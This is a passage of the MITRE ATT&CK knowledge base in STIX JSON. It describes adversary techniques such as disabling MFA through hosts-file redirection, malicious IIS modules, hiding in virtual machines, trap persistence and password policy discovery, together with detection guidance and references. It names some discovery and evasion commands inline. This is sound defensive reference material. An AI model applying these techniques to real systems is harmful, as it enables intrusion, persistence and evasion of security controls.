MFA bypass method such as [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621), adversaries may leverage their access to modify or completely disable MFA defenses. This can be accomplished by abusing legitimate features, such as excluding users from Azure AD Conditional Access Policies, registering a new yet vulnerable/adversary-controlled MFA method, or by manually patching MFA programs and configuration files to bypass expected functionality.(Citation: Mandiant APT42)(Citation: Azure AD Conditional Access Exclusions)\n\nFor example, modifying the Windows hosts file (`C:\\windows\\system32\\drivers\\etc\\hosts`) to redirect MFA calls to localhost instead of an MFA server may cause the MFA process to fail. If a \"fail open\" policy is in place, any otherwise successful authentication attempt may be granted access without enforcing MFA. (Citation: Russians Exploit Default MFA Protocol - CISA March 2022) \n\nDepending on the scope, goals, and privileges of the adversary, MFA defenses may be disabled for individual accounts or for all accounts tied to a larger group, such as all domain accounts in a victim's network environment.(Citation: Russians Exploit Default MFA Protocol - CISA March 2022) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Liran Ravich, CardinalOps", "Muhammad Moiz Arshad, @5T34L7H"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Azure AD", "Office 365", "SaaS", "IaaS", "Google Workspace", "Linux", "macOS"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Multi-Factor Authentication"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc", "created": "2022-05-31T19:31:38.431Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1556/006", "external_id": "T1556.006"}, {"source_name": "Russians Exploit Default MFA Protocol - CISA March 2022", "description": "Cyber Security Infrastructure Agency. (2022, March 15). Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and \u201cPrintNightmare\u201d Vulnerability. Retrieved May 31, 2022.", "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-074a"}, {"source_name": "Mandiant APT42", "description": "Mandiant. (n.d.). APT42: Crooked Charms, Cons and Compromise. Retrieved September 16, 2022.", "url": "https://www.mandiant.com/media/17826"}, {"source_name": "Azure AD Conditional Access Exclusions", "description": "Microsoft. (2022, August 26). Use Azure AD access reviews to manage users excluded from Conditional Access policies. Retrieved August 30, 2022.", "url": "https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-31T12:34:03.420Z", "name": "Remote Email Collection", "description": "Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for unusual login activity from unknown or abnormal locations, especially for privileged accounts (ex: Exchange administrator account).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Office 365", "Windows", "Google Workspace"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a", "created": "2020-02-19T18:52:24.547Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1114/002", "external_id": "T1114.002"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "IIS Components", "description": "Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extension/Filter}Version, Http{Extension/Filter}Proc, and (optionally) Terminate{Extension/Filter}. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)\n\nAdversaries may install malicious ISAPI extensions and filters to observe and/or modify traffic, execute commands on compromised machines, or proxy command and control traffic. ISAPI extensions and filters may have access to all IIS web requests and responses. For example, an adversary may abuse these mechanisms to modify HTTP responses in order to distribute malicious commands/content to previously comprised hosts.(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Extension All Incoming 2017)(Citation: Dell TG-3390)(Citation: Trustwave IIS Module 2013)(Citation: MMPC ISAPI Filter 2012)\n\nAdversaries may also install malicious IIS modules to observe and/or modify traffic. IIS 7.0 introduced modules that provide the same unrestricted access to HTTP requests and responses as ISAPI extensions and filters. IIS modules can be written as a DLL that exports RegisterModule, or as a .NET application that interfaces with ASP.NET APIs to access IIS HTTP requests.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Trustwave IIS Module 2013)(Citation: ESET IIS Malware 2021)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Wes Hurd"], "x_mitre_detection": "Monitor for creation and/or modification of files (especially DLLs on webservers) that could be abused as malicious ISAPI extensions/filters or IIS modules. Changes to %windir%\\system32\\inetsrv\\config\\applicationhost.config could indicate an IIS module installation.(Citation: Microsoft IIS Modules Overview 2007)(Citation: ESET IIS Malware 2021)\n\nMonitor execution and command-line arguments of AppCmd.exe, which may be abused to install malicious IIS modules.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Unit 42 RGDoor Jan 2018)(Citation: ESET IIS Malware 2021)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b46a801b-fd98-491c-a25a-bca25d6e3001", "created": "2021-06-03T18:44:29.770Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1505/004", "external_id": "T1505.004"}, {"source_name": "Microsoft ISAPI Extension Overview 2017", "description": "Microsoft. (2017, June 16). ISAPI Extension Overview. Retrieved June 3, 2021.", "url": "https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525172(v=vs.90)"}, {"source_name": "Microsoft ISAPI Filter Overview 2017", "description": "Microsoft. (2017, June 16). ISAPI Filter Overview. Retrieved June 3, 2021.", "url": "https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms524610(v=vs.90)"}, {"source_name": "IIS Backdoor 2011", "description": "Julien. (2011, February 2). IIS Backdoor. Retrieved June 3, 2021.", "url": "https://web.archive.org/web/20170106175935/http:/esec-lab.sogeti.com/posts/2011/02/02/iis-backdoor.html"}, {"source_name": "Trustwave IIS Module 2013", "description": "Grunzweig, J. (2013, December 9). The Curious Case of the Malicious IIS Module. Retrieved June 3, 2021.", "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-curious-case-of-the-malicious-iis-module/"}, {"source_name": "Microsoft ISAPI Extension All Incoming 2017", "description": "Microsoft. (2017, June 16). Intercepting All Incoming IIS Requests. Retrieved June 3, 2021.", "url": "https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525696(v=vs.90)"}, {"source_name": "Dell TG-3390", "description": "Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.", "url": "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage"}, {"source_name": "MMPC ISAPI Filter 2012", "description": "MMPC. (2012, October 3). Malware signed with the Adobe code signing certificate. Retrieved June 3, 2021.", "url": "https://web.archive.org/web/20140804175025/http:/blogs.technet.com/b/mmpc/archive/2012/10/03/malware-signed-with-the-adobe-code-signing-certificate.aspx"}, {"source_name": "Microsoft IIS Modules Overview 2007", "description": "Microsoft. (2007, November 24). IIS Modules Overview. Retrieved June 17, 2021.", "url": "https://docs.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview"}, {"source_name": "ESET IIS Malware 2021", "description": "Hromcov\u00e1, Z., Cherepanov, A. (2021). Anatomy of Native IIS Malware. Retrieved September 9, 2021.", "url": "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf"}, {"source_name": "Unit 42 RGDoor Jan 2018", "description": "Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor on Targets in the Middle East. Retrieved July 6, 2018.", "url": "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Invalid Code Signature", "description": "Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)\n\nUnlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52", "created": "2020-02-10T19:49:46.752Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1036/001", "external_id": "T1036.001"}, {"source_name": "Threatexpress MetaTwin 2017", "description": "Vest, J. (2017, October 9). Borrowing Microsoft MetaData and Signatures to Hide Binary Payloads. Retrieved September 10, 2019.", "url": "https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-13T17:57:09.388Z", "name": "Native API", "description": "Adversaries may directly interact with the native OS application programming interface (API) to access system functions. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes. (Citation: The MITRE Corporation May 2017) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations. \n\nFunctionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as memcpy and direct operations on memory registers can be used to modify user and system memory space.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "x_mitre_data_sources": ["Process: OS API Execution"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", "created": "2021-04-13T12:36:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0834", "external_id": "T0834"}, {"source_name": "The MITRE Corporation May 2017", "description": "The MITRE Corporation 2017, May 31 ATT&CK T1106: Native API Retrieved. 2021/04/26 ", "url": "https://attack.mitre.org/techniques/T1106/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Run Virtual Instance", "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)\n\nAdversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Johann Rehberger", "Janantha Marasinghe", "Menachem Shafran, XM Cyber"], "x_mitre_detection": "Consider monitoring for files and processes associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V). Consider monitoring the size of virtual machines running on the system. Adversaries may create virtual images which are smaller than those of typical virtual machines.(Citation: Shadowbunny VM Defense Evasion) Network adapter information may also be helpful in detecting the use of virtual instances.\n\nConsider monitoring for process command-line arguments that may be atypical for benign use of virtualization software. Usage of virtualization binaries or command-line arguments associated with running a silent installation may be especially suspect (ex. -silent, -ignore-reboot), as well as those associated with running a headless (in the background with no UI) virtual instance (ex. VBoxManage startvm $VM --type headless).(Citation: Shadowbunny VM Defense Evasion) Similarly, monitoring command line arguments which suppress notifications may highlight potentially malicious activity (ex. VBoxManage.exe setextradata global GUI/SuppressMessages \"all\").\n\nMonitor for commands which enable hypervisors such as Hyper-V. If virtualization software is installed by the adversary, the Registry may provide detection opportunities. Consider monitoring for [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software. \n\nBenign usage of virtualization technology is common in enterprise environments, data and events should not be viewed in isolation, but as part of a chain of behavior.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", "created": "2020-06-29T15:36:41.535Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1564/006", "external_id": "T1564.006"}, {"source_name": "SingHealth Breach Jan 2019", "description": "Committee of Inquiry into the Cyber Attack on SingHealth. (2019, January 10). Public Report of the Committee of Inquiry into the Cyber Attack on Singapore Health Services Private Limited's Patient Database. Retrieved June 29, 2020.", "url": "https://www.mci.gov.sg/-/media/mcicorp/doc/report-of-the-coi-into-the-cyber-attack-on-singhealth-10-jan-2019.ashx"}, {"source_name": "Sophos Ragnar May 2020", "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020.", "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/"}, {"source_name": "Shadowbunny VM Defense Evasion", "description": "Johann Rehberger. (2020, September 23). Beware of the Shadowbunny - Using virtual machines to persist and evade detections. Retrieved September 22, 2021.", "url": "https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Trap", "description": "The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where \"command list\" will be executed when \"signals\" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS"], "x_mitre_version": "1.1", "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b53dbcc6-147d-48bb-9df4-bcb8bb808ff6", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1154", "external_id": "T1154"}, {"source_name": "Trap Manual", "description": "ss64. (n.d.). trap. Retrieved May 21, 2019.", "url": "https://ss64.com/bash/trap.html"}, {"source_name": "Cyberciti Trap Statements", "description": "Cyberciti. (2016, March 29). Trap statement. Retrieved May 21, 2019.", "url": "https://bash.cyberciti.biz/guide/Trap_statement"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-10-13T17:57:09.581Z", "name": "Loss of Availability", "description": "Adversaries may attempt to disrupt essential components or systems to prevent owner and operator from delivering products or services. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) \n\nAdversaries may leverage malware to delete or encrypt critical data on HMIs, workstations, or databases.\n\nIn the 2021 Colonial Pipeline ransomware incident, pipeline operations were temporally halted on May 7th and were not fully restarted until May 12th. (Citation: Colonial Pipeline Company May 2021)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b5b9bacb-97f2-4249-b804-47fd44de1f95", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0826", "external_id": "T0826"}, {"source_name": "Colonial Pipeline Company May 2021", "description": "Colonial Pipeline Company 2021, May Media Statement Update: Colonial Pipeline System Disruption Retrieved. 2021/10/08 ", "url": "https://www.colpipe.com/news/press-releases/media-statement-colonial-pipeline-system-disruption"}, {"source_name": "Corero", "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf"}, {"source_name": "Michael J. Assante and Robert M. Lee", "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297"}, {"source_name": "Tyson Macaulay", "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-11-08T14:00:00.188Z", "name": "Password Policy Discovery", "description": "Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).\n\nPassword policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to discover password policy information (e.g. show aaa, show aaa common-criteria policy all).(Citation: US-CERT-TA18-106A)\n\nPassword policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Regina Elwell", "Sudhanshu Chauhan, @Sudhanshu_C", "Isif Ibrahima, Mandiant", "Austin Clark, @c2defense"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor logs and processes for tools and command line arguments that may indicate they're being used for password policy discovery. Correlate that activity with other suspicious activity from the originating system to reduce potential false positives from valid user or administrator activity. Adversaries will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "macOS", "IaaS", "Network"], "x_mitre_version": "1.5", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1201", "external_id": "T1201"}, {"source_name": "AWS GetPasswordPolicy", "description": "Amazon Web Services. (n.d.). AWS API GetAccountPasswordPolicy. Retrieved June 8, 2021.", "url": "https://docs.aws.amazon.com/IAM/latest/APIReference/API_GetAccountPasswordPolicy.html"}, {"source_name": "Jamf User Password Policies", "description": "Holland, J. (2016, January 25). User password policies on non AD machines. Retrieved April 5, 2018.", "url": "https://www.jamf.com/jamf-nation/discussions/18574/user-password-policies-on-non-ad-machines"}, {"source_name": "Superuser Linux Password Policies", "description": "Matutiae, M. (2014, August 6). How to display password policy information for a user (Ubuntu)?. Retrieved April 5, 2018.", "url": "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu"}, {"source_name": "US-CERT-TA18-106A", "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-03-01T15:49:15.588Z", "name": "Event Triggered Execution", "description": "Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.(Citation: Backdooring an AWS account)(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)\n\nAdversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware)\n\nSince the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitoring for additions or modifications of mechanisms that could be used to trigger event-based execution, especially the addition of abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network. Also look for changes that do not line up with updates, patches, or other planned administrative activity. \n\nThese mechanisms may vary by OS, but are typically stored in central repositories that store configuration information such as the Windows Registry, Common Information Model (CIM), and/or specific named files, the last of which can be hashed and compared to known good values. \n\nMonitor for processes, API/System calls, and other common ways of manipulating these event repositories. \n\nTools such as Sysinternals Autoruns can be used to detect changes to execution triggers that could be attempts at persistence. Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques. \n\nMonitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "SaaS", "IaaS", "Office 365"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "created": "2020-01-22T21:04:23.285Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1546", "external_id": "T1546"}, {"source_name": "FireEye WMI 2015", "description": "Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.", "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf"}, {"source_name": "Microsoft DART Case Report 001", "description": "Berk Veral. (2020, March 9). Real-life cybercrime stories from DART, the Microsoft Detection and Response Team. Retrieved May 27, 2022.", "url": "https://www.microsoft.com/security/blog/2020/03/09/real-life-cybercrime-stories-dart-microsoft-detection-and-response-team"}, {"source_name": "amnesia malware", "description": "Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018.", "url": "https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/"}, {"source_name": "Backdooring an AWS account", "description": "Daniel Grzelak. (2016, July 9). Backdooring an AWS account. Retrieved May 27, 2022.", "url": "https://medium.com/daniel-grzelak/backdooring-an-aws-account-da007d36f8f9"}, {"source_name": "Varonis Power Automate Data Exfiltration", "description": "Eric Saraga. (2022, February 2). Using Power Automate for Covert Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.", "url": "https://www.varonis.com/blog/power-automate-data-exfiltration"}, {"source_name": "Malware Persistence on OS X", "description": "Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017.", "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], 